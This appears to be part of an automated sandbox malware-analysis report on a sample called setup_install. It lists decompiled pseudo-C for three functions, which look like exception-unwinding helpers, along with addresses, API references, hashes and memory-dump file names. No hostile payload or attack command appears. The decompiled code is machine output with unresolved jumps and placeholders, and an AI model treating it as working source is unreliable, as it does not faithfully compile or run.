Instruction Fuzzy Hash: 00E182719042298FEB11CF25C8903DEFBB2EF45304F1481AAD5587B386D7799A89CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F560, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040F560(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, char _a4) {
				intOrPtr _v0;
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v80;
				intOrPtr _v84;
				void _v156;
				void _v284;
				char _v288;
				intOrPtr _v312;
				void* __ebp;
				void* _t39;
				intOrPtr _t46;
				void* _t71;
				void* _t74;
				intOrPtr* _t75;

				_t71 = _t74;
				_push(__edi);
				_push(__esi);
				_push(__ebx);
				_push(__edx);
				_push(__eax);
				_t75 = _t74 - 0x124;
				if( *((intOrPtr*)(_a4 + 0xc)) == 0) {
					 *_t75 = _a4;
					return E0040F2C0(_a4, __ebx, __edx, __edi, __esi);
				} else {
					E0040EB20( &_v284, _v0,  &_a4);
					if (E0040EDA0(memcpy( &_v156,  &_v284, 0x20 << 2),  &_v288,  &_v156) != 7) goto 0x498ca3;
					_t39 = L0040EED0( &_v284,  &_v156);
					_t46 = _v80;
					_v312 = _t46;
					 *((intOrPtr*)(_t75 + 0xc)) = _v84;
					E0040F2B0(_v84);
					 *((intOrPtr*)(_t71 + _t39 + 4)) = _t46;
					return _v24;
				}
			}

0x0040f561
0x0040f563
0x0040f564
0x0040f565
0x0040f566
0x0040f567
0x0040f568
0x0040f576
0x0040f603
0x0040f615
0x0040f57c
0x0040f592
0x0040f5b5
0x0040f5c3
0x0040f5c8
0x0040f5d0
0x0040f5d4
0x0040f5d7
0x0040f5de
0x0040f5fa
0x0040f5fa

APIs

abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 3591ce61a7bd47d1a10565eb2c3c7ca3a09161ceb4abbc59208575301a5f69f5
Instruction ID: d24d014ee6bf90d52f699b1a8fee7f8b9eb70895cd73a3eb17868255fc2fc599
Opcode Fuzzy Hash: 3591ce61a7bd47d1a10565eb2c3c7ca3a09161ceb4abbc59208575301a5f69f5
Instruction Fuzzy Hash: 3A21CF74A0020DABCF10EF65C4819DEB7B5EF49358F1488A9AC0977342D634EE45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040DBA0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 403
stringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E0040DBA0(signed int __eax, void* __edx) {
				unsigned int _t164;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t171;
				intOrPtr _t172;
				signed int _t178;
				signed char* _t180;
				signed int _t183;
				signed int _t186;
				signed int _t190;
				void* _t197;
				signed int _t199;
				signed int _t203;
				signed int _t204;
				intOrPtr _t205;
				signed int _t206;
				signed int _t208;
				signed int _t211;
				void* _t213;
				signed int _t217;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed char* _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed char* _t229;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t249;
				signed char _t250;
				signed char _t251;
				signed char _t253;
				signed char _t259;
				signed char _t260;
				signed int _t263;
				signed char* _t264;
				intOrPtr _t265;
				signed int _t268;
				signed int _t271;
				signed int _t275;
				intOrPtr _t276;
				signed int _t282;
				signed int _t283;
				signed int _t287;
				signed char _t290;
				signed int _t293;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed char* _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed char* _t311;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				void* _t319;
				signed int* _t321;
				void* _t325;

				_t263 = __edx;
				_t221 = __eax;
				memset(__edx, 0, 0x30 << 2);
				_t321 = _t319 - 0x4c + 0xc;
				 *((intOrPtr*)(_t221 + 0x68)) = 0;
				 *((intOrPtr*)(_t221 + 0x50)) = 0;
				_t232 =  *((intOrPtr*)(_t221 + 0x4c));
				if(_t232 == 0) {
					L57:
					return 5;
				} else {
					_t293 = _t263;
					_t321[7] = _t221;
					_t321[1] = _t221 + 0x54;
					_t164 =  *(_t221 + 0x60);
					_t321[8] = _t164;
					 *_t321 = _t232 + (_t164 >> 0x1f) - 1;
					_t167 = E00410930(_t232);
					_t321[8] = _t167;
					_t168 = _t321[7];
					if(_t167 == 0) {
						_t264 =  *(_t168 + 0x4c);
						_t233 =  *((intOrPtr*)(_t168 + 0x48));
						__eflags =  *((char*)(_t264 - 2)) - 0xff;
						_t169 =  *(_t264 - 5) & 0x000000ff;
						if( *((char*)(_t264 - 2)) == 0xff) {
							__eflags =  *((char*)(_t264 - 1)) - 0xd0;
							if( *((char*)(_t264 - 1)) != 0xd0) {
								goto L52;
							} else {
								__eflags =  *_t264 - 0x83;
								if( *_t264 != 0x83) {
									goto L52;
								} else {
									__eflags = _t264[1] - 0xf8;
									if(_t264[1] != 0xf8) {
										goto L52;
									} else {
										goto L83;
									}
								}
							}
						} else {
							L52:
							__eflags = _t169 - 0xe8;
							if(_t169 == 0xe8) {
								__eflags =  *((char*)(_t264 - 4)) - 0x68;
								_t170 =  *_t264 & 0x000000ff;
								if( *((char*)(_t264 - 4)) == 0x68) {
									__eflags = _t170 - 0xc3;
									if(_t170 != 0xc3) {
										goto L85;
									} else {
										L83:
										_t172 =  *((intOrPtr*)( *_t233 + 4));
										goto L74;
									}
								} else {
									L85:
									__eflags = _t170 - 0x83;
									if(_t170 != 0x83) {
										goto L54;
									} else {
										__eflags = _t264[1] - 0xc4;
										_t171 = 5;
										if(_t264[1] == 0xc4) {
											__eflags = _t264[3] - 0xb8;
											if(_t264[3] == 0xb8) {
												_t172 =  *((intOrPtr*)(_t233 + 0x38));
												goto L74;
											}
										}
										goto L45;
									}
								}
							} else {
								__eflags = _t169 - 0x8b;
								if(_t169 == 0x8b) {
									__eflags =  *((char*)(_t264 - 4)) - 0x4d;
									if( *((char*)(_t264 - 4)) != 0x4d) {
										goto L54;
									} else {
										__eflags =  *_t264 - 0x64;
										if( *_t264 != 0x64) {
											goto L54;
										} else {
											__eflags = _t264[1] - 0x8b;
											if(_t264[1] != 0x8b) {
												goto L57;
											} else {
												_t172 =  *((intOrPtr*)(_t233 + 8));
												L74:
												_t92 = _t172 + 0xc4; // 0x5e5bd089
												_t265 =  *_t92;
												 *(_t293 + 4) = 1;
												 *(_t293 + 0xa0) = 1;
												 *(_t293 + 0x1c) = 1;
												_t96 = _t172 + 0xb0; // 0x41c5d0
												 *((intOrPtr*)(_t293 + 0x98)) = 4;
												 *((intOrPtr*)(_t293 + 0x94)) = _t265 - _t233;
												 *_t293 = _t96 - _t265;
												_t99 = _t172 + 0xa4; // 0x41c5c4
												 *(_t293 + 0xc) = 1;
												 *((intOrPtr*)(_t293 + 0x18)) = _t99 - _t265;
												_t102 = _t172 + 0xac; // 0x41c5cc
												 *(_t293 + 0x14) = 1;
												 *((intOrPtr*)(_t293 + 8)) = _t102 - _t265;
												_t105 = _t172 + 0xa8; // 0x41c5c8
												 *(_t293 + 0x34) = 1;
												 *((intOrPtr*)(_t293 + 0x10)) = _t105 - _t265;
												_t108 = _t172 + 0xa0; // 0x41c5c0
												 *(_t293 + 0x3c) = 1;
												 *((intOrPtr*)(_t293 + 0x30)) = _t108 - _t265;
												_t111 = _t172 + 0x9c; // 0x41c5bc
												 *(_t293 + 0x2c) = 1;
												 *((intOrPtr*)(_t293 + 0x38)) = _t111 - _t265;
												_t114 = _t172 + 0xb4; // 0x41c5d4
												 *(_t293 + 0x44) = 1;
												 *((intOrPtr*)(_t293 + 0x40)) = _t172 + 0xb8 - _t265;
												_t171 = 0;
												 *((intOrPtr*)(_t293 + 0x28)) = _t114 - _t265;
												 *(_t293 + 0xb4) = 8;
												 *((char*)(_t293 + 0xbb)) = 1;
												goto L45;
											}
										}
									}
								} else {
									L54:
									__eflags =  *((char*)(_t264 - 1)) - 0x83;
									if( *((char*)(_t264 - 1)) != 0x83) {
										goto L57;
									} else {
										__eflags =  *_t264 - 9;
										if( *_t264 != 9) {
											goto L57;
										} else {
											__eflags = _t264[1];
											if(_t264[1] == 0) {
												__eflags = _t264[2] - 0x2d;
												if(_t264[2] != 0x2d) {
													goto L57;
												} else {
													__eflags = _t264[3];
													if(_t264[3] != 0) {
														goto L57;
													} else {
														__eflags = _t264[4] - 0x10;
														if(_t264[4] != 0x10) {
															goto L57;
														} else {
															__eflags = _t264[5];
															if(_t264[5] != 0) {
																goto L57;
															} else {
																 *(_t293 + 0xa0) = 1;
																_t171 = 0;
																 *((intOrPtr*)(_t293 + 0x98)) = 4;
																 *((intOrPtr*)(_t293 + 0x94)) = 4;
																 *(_t293 + 0xc) = 1;
																 *((intOrPtr*)(_t293 + 8)) = 0xfffffffc;
																 *(_t293 + 0xb4) = 8;
																 *(_t293 + 0x44) = 1;
																 *((intOrPtr*)(_t293 + 0x40)) = 0;
																 *((char*)(_t293 + 0xbb)) = 1;
																goto L45;
															}
														}
													}
												}
											} else {
												goto L57;
											}
										}
									}
								}
							}
						}
					} else {
						 *((intOrPtr*)(_t293 + 0xa4)) =  *((intOrPtr*)(_t168 + 0x5c));
						_t178 = _t321[8] + 4 -  *((intOrPtr*)(_t321[8] + 4));
						_t19 = _t178 + 9; // 0x474e554c
						_t222 = _t19;
						_t321[0xa] = _t178;
						 *_t321 = _t222;
						_t321[9] = _t222;
						_t24 = strlen(??) + 1; // 0x474e554d
						_t180 = _t222 + _t24;
						if( *(_t178 + 9) == 0x65) {
							_t298 = _t321[0xa];
							__eflags =  *((char*)(_t298 + 0xa)) - 0x68;
							if( *((char*)(_t298 + 0xa)) == 0x68) {
								_t290 =  *_t180;
								_t180 =  &(_t180[4]);
								_t321[9] = _t298 + 0xb;
								 *(_t293 + 0xbc) = _t290;
							}
						}
						_t223 =  *_t180 & 0x000000ff;
						_t249 =  *(_t321[0xa] + 8) & 0x000000ff;
						_t321[0xb] = _t249;
						if(_t249 > 3) {
							__eflags = _t223 - 4;
							if(_t223 != 4) {
								goto L63;
							} else {
								__eflags = _t180[1];
								if(_t180[1] != 0) {
									goto L63;
								} else {
									_t223 = _t180[2] & 0x000000ff;
									_t180 =  &(_t180[2]);
									goto L4;
								}
							}
						} else {
							L4:
							_t300 = 0;
							_t250 = 0;
							while(1) {
								_t180 =  &(_t180[1]);
								_t268 = (_t223 & 0x0000007f) << _t250;
								_t250 = _t250 + 7;
								_t300 = _t300 | _t268;
								if(_t223 >= 0) {
									break;
								}
								_t223 =  *_t180 & 0x000000ff;
							}
							 *(_t293 + 0xb0) = _t300;
							_t313 = 0;
							_t251 = 0;
							while(1) {
								_t29 =  &(_t180[1]); // 0x474e554d
								_t301 = _t29;
								_t224 =  *(_t301 - 1) & 0x000000ff;
								_t271 = (_t224 & 0x0000007f) << _t251;
								_t251 = _t251 + 7;
								_t313 = _t313 | _t271;
								if(_t224 >= 0) {
									break;
								}
								_t180 = _t301;
							}
							_t302 = _t224;
							_t225 = _t301;
							if(_t251 <= 0x1f && (_t302 & 0x00000040) != 0) {
								_t313 = _t313 | 0xffffffff << _t251;
							}
							_t252 = 0;
							 *(_t293 + 0xac) = _t313;
							_t303 = 0;
							if(_t321[0xb] == 1) {
								_t46 =  &(_t180[2]); // 0x474e554e
								_t226 = _t46;
								 *(_t293 + 0xb4) =  *_t225 & 0x000000ff;
							} else {
								do {
									_t225 =  &(_t225[1]);
									_t287 =  *(_t225 - 1) & 0x000000ff;
									_t220 = (_t287 & 0x0000007f) << _t252;
									_t252 = _t252 + 7;
									_t303 = _t303 | _t220;
								} while (_t287 < 0);
								 *(_t293 + 0xb4) = _t303;
							}
							 *(_t293 + 0xb9) = 0xff;
							_t314 = 0;
							_t183 =  *(_t321[9]) & 0x000000ff;
							if(_t183 == 0x7a) {
								_t304 = 0;
								_t253 = 0;
								__eflags = 0;
								do {
									_t226 = _t226 + 1;
									_t275 =  *(_t226 - 1) & 0x000000ff;
									_t186 = (_t275 & 0x0000007f) << _t253;
									_t253 = _t253 + 7;
									_t304 = _t304 | _t186;
									__eflags = _t275;
								} while (_t275 < 0);
								_t314 = _t226 + _t304;
								_t305 = _t321[9];
								 *((char*)(_t293 + 0xba)) = 1;
								_t252 = _t305 + 1;
								_t183 =  *(_t305 + 1) & 0x000000ff;
								_t321[9] = _t305 + 1;
							}
							_t321[9] = _t314;
							_t315 = _t226;
							_t307 = _t321[9] + 1;
							while(_t183 != 0) {
								if(_t183 != 0x4c) {
									__eflags = _t183 - 0x52;
									if(_t183 == 0x52) {
										_t211 =  *_t315 & 0x000000ff;
										_t315 = _t315 + 1;
										 *(_t293 + 0xb8) = _t211;
										goto L23;
									} else {
										__eflags = _t183 - 0x50;
										if(_t183 == 0x50) {
											_t226 =  *_t315 & 0x000000ff;
											_t213 = E0040D300(_t226, _t252, _t321[7]);
											_t51 = _t315 + 1; // 0x474e554f
											_t252 = _t51;
											 *_t321 =  &(_t321[0xf]);
											_t315 = E0040D1C0(_t226, _t51, _t213);
											 *(_t293 + 0xa8) = _t321[0xf];
											goto L23;
										} else {
											__eflags = _t183 - 0x53;
											if(_t183 != 0x53) {
												_t316 = _t321[9];
												L62:
												__eflags = _t316;
												if(_t316 != 0) {
													L33:
													_t308 = _t321[0xa];
													_t254 = _t321[7];
													 *_t321 = _t293;
													_t276 = _t308 +  *_t308 + 4;
													E0040D340(_t316, _t254, _t276);
													_t190 =  *(_t293 + 0xb8) & 0x000000ff;
													__eflags = _t190 - 0xff;
													if(_t190 == 0xff) {
														_t227 = 8;
														goto L39;
													} else {
														_t204 = _t190 & 0x00000007;
														__eflags = _t204 - 2;
														if(__eflags == 0) {
															_t227 = 0xc;
															goto L39;
														} else {
															if(__eflags <= 0) {
																__eflags = _t204;
																if(_t204 != 0) {
																	goto L91;
																} else {
																	goto L50;
																}
															} else {
																__eflags = _t204 - 3;
																if(_t204 == 3) {
																	L50:
																	_t227 = 0x10;
																	goto L39;
																} else {
																	__eflags = _t204 - 4;
																	if(_t204 != 4) {
																		L91:
																		abort();
																		_push(_t316);
																		_push(_t293);
																		_push(_t308);
																		_t311 = _t204;
																		_push(_t226);
																		_t325 = _t321 - 0x13c;
																		_t205 =  *((intOrPtr*)(_t325 + 0x150));
																		 *((intOrPtr*)(_t325 + 0x18)) = _t276;
																		 *(_t325 + 0x1c) = _t254;
																		 *((intOrPtr*)(_t325 + 0x30)) = _t205;
																		__eflags = _t311 - _t276;
																		if(_t311 < _t276) {
																			 *(_t325 + 0x14) = 1;
																			while(1) {
																				L94:
																				_t206 =  *_t311 & 0x000000ff;
																				_t145 =  &(_t311[1]); // 0x1
																				_t229 = _t145;
																				_t260 = _t206 - 3;
																				_t283 = _t206;
																				__eflags = _t260 - 0xee;
																				if(_t260 > 0xee) {
																					goto L100;
																				} else {
																					break;
																				}
																				do {
																					L100:
																					abort();
																					__eflags = _t283 - 6;
																					if(_t283 != 6) {
																						goto L103;
																					} else {
																						_t293 =  *_t293;
																						_t311 = _t229;
																						L96:
																						__eflags = _t316 - 0x3f;
																						if (_t316 - 0x3f > 0) goto 0x498c76;
																						 *(_t325 + 0x30 + _t316 * 4) = _t293;
																						 *(_t325 + 0x14) = _t316 + 1;
																						__eflags =  *((intOrPtr*)(_t325 + 0x18)) - _t311;
																						if( *((intOrPtr*)(_t325 + 0x18)) > _t311) {
																							goto L94;
																						}
																						_t208 =  *(_t325 + 0x14);
																						__eflags = _t208;
																						if (_t208 == 0) goto 0x498c76;
																						_t205 =  *((intOrPtr*)(_t325 + 0x2c + _t208 * 4));
																						goto L99;
																					}
																					goto L105;
																					L103:
																					__eflags = _t283 - 0x19;
																				} while (_t283 != 0x19);
																				_t311 = _t229;
																				_t293 = (_t293 ^ _t293 >> 0x0000001f) - (_t293 >> 0x1f);
																				goto L96;
																			}
																			goto ( *((intOrPtr*)(0x4a4bd0 + (_t260 & 0x000000ff) * 4)));
																		}
																		L99:
																		return _t205;
																	} else {
																		_t227 = 0x18;
																		L39:
																		_t228 = _t227 + _t321[8];
																		__eflags =  *((char*)(_t293 + 0xba));
																		_t317 =  *(_t293 + 0xb9) & 0x000000ff;
																		if( *((char*)(_t293 + 0xba)) == 0) {
																			__eflags = _t317 - 0xff;
																			if(_t317 == 0xff) {
																				goto L44;
																			} else {
																				_t309 = 0;
																				__eflags = 0;
																				goto L48;
																			}
																			goto L105;
																		} else {
																			_t310 = 0;
																			_t259 = 0;
																			__eflags = 0;
																			do {
																				_t228 = _t228 + 1;
																				_t282 =  *(_t228 - 1) & 0x000000ff;
																				_t203 = (_t282 & 0x0000007f) << _t259;
																				_t259 = _t259 + 7;
																				_t310 = _t310 | _t203;
																				__eflags = _t282;
																			} while (_t282 < 0);
																			_t254 = _t317;
																			_t309 = _t310 + _t228;
																			_t199 = _t228;
																			__eflags = _t317 - 0xff;
																			if(_t317 != 0xff) {
																				L48:
																				_t197 = E0040D300(_t317 & 0x000000ff, _t254, _t321[7]);
																				 *_t321 =  &(_t321[0xf]);
																				_t199 = E0040D1C0(_t317 & 0x000000ff, _t228, _t197);
																				 *(_t321[7] + 0x50) = _t321[0xf];
																			}
																			__eflags = _t309;
																			_t200 =  !=  ? _t309 : _t199;
																			_t228 =  !=  ? _t309 : _t199;
																		}
																		L44:
																		 *_t321 = _t293;
																		E0040D340(_t228, _t321[7], _t321[8] +  *(_t321[8]) + 4);
																		_t171 = 0;
																		__eflags = 0;
																		L45:
																		return _t171;
																	}
																}
															}
														}
													}
												} else {
													L63:
													return 3;
												}
											} else {
												 *((char*)(_t293 + 0xbb)) = 1;
												goto L23;
											}
										}
									}
								} else {
									_t217 =  *_t315 & 0x000000ff;
									_t315 = _t315 + 1;
									 *(_t293 + 0xb9) = _t217;
									L23:
									_t183 =  *_t307 & 0x000000ff;
									_t307 =  &(_t307[1]);
									continue;
								}
								goto L105;
							}
							_t226 = _t315;
							_t316 = _t321[9];
							__eflags = _t316;
							if(_t316 == 0) {
								_t316 = _t226;
								goto L62;
							} else {
								goto L33;
							}
						}
					}
				}
				L105:
			}

0x0040dba0
0x0040dbab
0x0040dbb2
0x0040dbb2
0x0040dbb4
0x0040dbbb
0x0040dbc2
0x0040dbc7
0x0040df2b
0x0040df37
0x0040dbcd
0x0040dbd0
0x0040dbd2
0x0040dbd6
0x0040dbda
0x0040dbdd
0x0040dbe8
0x0040dbeb
0x0040dbf2
0x0040dbf6
0x0040dbfa
0x0040def2
0x0040def5
0x0040def8
0x0040defc
0x0040df00
0x0040e150
0x0040e154
0x00000000
0x0040e15a
0x0040e15a
0x0040e15d
0x00000000
0x0040e163
0x0040e163
0x0040e167
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e167
0x0040e15d
0x0040df06
0x0040df06
0x0040df06
0x0040df08
0x0040e180
0x0040e184
0x0040e187
0x0040e1b2
0x0040e1b4
0x00000000
0x0040e1b6
0x0040e16d
0x0040e16f
0x00000000
0x0040e16f
0x0040e189
0x0040e189
0x0040e189
0x0040e18b
0x00000000
0x0040e191
0x0040e191
0x0040e195
0x0040e19a
0x0040e1a0
0x0040e1a4
0x0040e1aa
0x00000000
0x0040e1aa
0x0040e1a4
0x00000000
0x0040e19a
0x0040e18b
0x0040df0e
0x0040df0e
0x0040df10
0x0040dfe0
0x0040dfe4
0x00000000
0x0040dfea
0x0040dfea
0x0040dfed
0x00000000
0x0040dff3
0x0040dff3
0x0040dff7
0x00000000
0x0040dffd
0x0040dffd
0x0040e000
0x0040e000
0x0040e000
0x0040e006
0x0040e00d
0x0040e019
0x0040e022
0x0040e028
0x0040e034
0x0040e03a
0x0040e03c
0x0040e044
0x0040e04b
0x0040e04e
0x0040e056
0x0040e05d
0x0040e060
0x0040e068
0x0040e06f
0x0040e072
0x0040e07a
0x0040e081
0x0040e084
0x0040e08c
0x0040e093
0x0040e096
0x0040e0a5
0x0040e0ac
0x0040e0af
0x0040e0b1
0x0040e0b4
0x0040e0be
0x00000000
0x0040e0be
0x0040dff7
0x0040dfed
0x0040df16
0x0040df16
0x0040df16
0x0040df1a
0x00000000
0x0040df1c
0x0040df1c
0x0040df1f
0x00000000
0x0040df21
0x0040df21
0x0040df25
0x0040e0d0
0x0040e0d4
0x00000000
0x0040e0da
0x0040e0da
0x0040e0de
0x00000000
0x0040e0e4
0x0040e0e4
0x0040e0e8
0x00000000
0x0040e0ee
0x0040e0ee
0x0040e0f2
0x00000000
0x0040e0f8
0x0040e0f8
0x0040e102
0x0040e104
0x0040e10e
0x0040e118
0x0040e11f
0x0040e126
0x0040e130
0x0040e137
0x0040e13e
0x00000000
0x0040e13e
0x0040e0f2
0x0040e0e8
0x0040e0de
0x00000000
0x00000000
0x00000000
0x0040df25
0x0040df1f
0x0040df1a
0x0040df10
0x0040df08
0x0040dc00
0x0040dc07
0x0040dc10
0x0040dc13
0x0040dc13
0x0040dc18
0x0040dc1c
0x0040dc1f
0x0040dc2c
0x0040dc2c
0x0040dc30
0x0040dd50
0x0040dd54
0x0040dd58
0x0040dd5e
0x0040dd63
0x0040dd66
0x0040dd6a
0x0040dd6a
0x0040dd58
0x0040dc3a
0x0040dc3d
0x0040dc41
0x0040dc48
0x0040dfc0
0x0040dfc3
0x00000000
0x0040dfc5
0x0040dfc5
0x0040dfc9
0x00000000
0x0040dfcb
0x0040dfcb
0x0040dfcf
0x00000000
0x0040dfcf
0x0040dfc9
0x0040dc4e
0x0040dc4e
0x0040dc4e
0x0040dc50
0x0040dc57
0x0040dc59
0x0040dc5f
0x0040dc61
0x0040dc64
0x0040dc68
0x00000000
0x00000000
0x0040dc54
0x0040dc54
0x0040dc6a
0x0040dc70
0x0040dc72
0x0040dc82
0x0040dc82
0x0040dc82
0x0040dc85
0x0040dc8e
0x0040dc90
0x0040dc93
0x0040dc97
0x00000000
0x00000000
0x0040dc80
0x0040dc80
0x0040dc9b
0x0040dc9d
0x0040dca2
0x0040dcb0
0x0040dcb0
0x0040dcb4
0x0040dcbb
0x0040dcc1
0x0040dcc3
0x0040dd78
0x0040dd78
0x0040dd7b
0x0040dcd0
0x0040dcd0
0x0040dcd0
0x0040dcd3
0x0040dcdc
0x0040dcde
0x0040dce1
0x0040dce3
0x0040dce7
0x0040dce7
0x0040dcf1
0x0040dcf8
0x0040dcfa
0x0040dcff
0x0040df40
0x0040df42
0x0040df42
0x0040df44
0x0040df44
0x0040df47
0x0040df50
0x0040df52
0x0040df55
0x0040df57
0x0040df57
0x0040df5b
0x0040df5e
0x0040df62
0x0040df69
0x0040df6c
0x0040df70
0x0040df70
0x0040dd09
0x0040dd0d
0x0040dd0f
0x0040dd35
0x0040dd3f
0x0040dd14
0x0040dd16
0x0040dd90
0x0040dd94
0x0040dd97
0x00000000
0x0040dd18
0x0040dd18
0x0040dd1a
0x0040dda0
0x0040ddaa
0x0040ddb3
0x0040ddb3
0x0040ddb6
0x0040ddc2
0x0040ddc8
0x00000000
0x0040dd20
0x0040dd20
0x0040dd22
0x0040df80
0x0040df84
0x0040df84
0x0040df86
0x0040dde1
0x0040dde1
0x0040dde5
0x0040ddeb
0x0040ddee
0x0040ddf4
0x0040ddf9
0x0040de00
0x0040de02
0x0040dfb0
0x00000000
0x0040de08
0x0040de08
0x0040de0b
0x0040de0d
0x0040dfa4
0x00000000
0x0040de13
0x0040de13
0x0040dee0
0x0040dee2
0x00000000
0x00000000
0x00000000
0x00000000
0x0040de19
0x0040de19
0x0040de1b
0x0040dee8
0x0040dee8
0x00000000
0x0040de21
0x0040de21
0x0040de23
0x0040e1b8
0x0040e1b8
0x0040e1c0
0x0040e1c1
0x0040e1c2
0x0040e1c3
0x0040e1c5
0x0040e1c6
0x0040e1cc
0x0040e1d3
0x0040e1d7
0x0040e1db
0x0040e1df
0x0040e1e1
0x0040e1e3
0x0040e1f0
0x0040e1f0
0x0040e1f0
0x0040e1f3
0x0040e1f3
0x0040e1f6
0x0040e1f9
0x0040e1fb
0x0040e1fe
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e6b9
0x0040e6b9
0x0040e6b9
0x0040e6c0
0x0040e6c3
0x00000000
0x0040e6c5
0x0040e6c5
0x0040e6c7
0x0040e220
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x0040e234
0x0040e238
0x00000000
0x00000000
0x0040e23a
0x0040e23e
0x0040e240
0x0040e246
0x00000000
0x0040e246
0x00000000
0x0040e6d0
0x0040e6d0
0x0040e6d0
0x0040e6d7
0x0040e6de
0x00000000
0x0040e6de
0x0040e207
0x0040e207
0x0040e24a
0x0040e254
0x0040de29
0x0040de29
0x0040de2e
0x0040de2e
0x0040de32
0x0040de39
0x0040de40
0x0040dea2
0x0040dea4
0x00000000
0x0040dea6
0x0040dea6
0x0040dea6
0x00000000
0x0040dea6
0x00000000
0x0040de42
0x0040de42
0x0040de44
0x0040de44
0x0040de50
0x0040de50
0x0040de53
0x0040de5c
0x0040de5e
0x0040de61
0x0040de63
0x0040de63
0x0040de67
0x0040de69
0x0040de6b
0x0040de6d
0x0040de70
0x0040dea8
0x0040deb3
0x0040debe
0x0040dec5
0x0040ded2
0x0040ded2
0x0040de72
0x0040de74
0x0040de77
0x0040de77
0x0040de79
0x0040de7f
0x0040de8c
0x0040de91
0x0040de91
0x0040de93
0x0040de9a
0x0040de9a
0x0040de23
0x0040de1b
0x0040de13
0x0040de0d
0x0040df8c
0x0040df8c
0x0040df98
0x0040df98
0x0040dd28
0x0040dd28
0x00000000
0x0040dd28
0x0040dd22
0x0040dd1a
0x0040dd41
0x0040dd41
0x0040dd45
0x0040dd48
0x0040dd2f
0x0040dd2f
0x0040dd32
0x00000000
0x0040dd32
0x00000000
0x0040dd3f
0x0040ddd3
0x0040ddd5
0x0040ddd9
0x0040dddb
0x0040dfa0
0x00000000
0x00000000
0x00000000
0x00000000
0x0040dddb
0x0040dc48
0x0040dbfa
0x00000000

APIs

strlen.MSVCRT ref: 0040DC23

Strings

|iI, xrefs: 0040DBA9

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: strlen
String ID: |iI
API String ID: 39653677-429220348
Opcode ID: 5aac0fca2e82c5b35444435a4737412660954014a1a4739c956bef16720a1ef7
Instruction ID: 087167e8943e571128125ff68318a977dcffc28352dd0532b4700123704e7802
Opcode Fuzzy Hash: 5aac0fca2e82c5b35444435a4737412660954014a1a4739c956bef16720a1ef7
Instruction Fuzzy Hash: 36F1E4B1A087515FD714CF68C4443A6FBE1BF45314F08827ED8996B3C2C379A959CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F8E0, Relevance: 4.6, APIs: 3, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F8E0(signed int __eax, void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				intOrPtr _v32;
				signed char _t14;

				_v32 = __edx;
				if(__eax != 0x50) {
					_t14 = __eax & 0x0000000f;
					if (_t14 - 0xc > 0) goto 0x498ca8;
					goto ( *((intOrPtr*)(0x4a4ff8 + (_t14 & 0x000000ff) * 4)));
				}
				_t5 = (__ecx + 0x00000003 & 0xfffffffc) + 4; // 0x20247c8d
				 *_a4 =  *(__ecx + 0x00000003 & 0xfffffffc);
				return _t5;
			}

0x0040f8e9
0x0040f8ef
0x0040f8f3
0x0040f8f9
0x0040f902
0x0040f902
0x0040f94c
0x0040f94f
0x0040f95a

APIs

abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
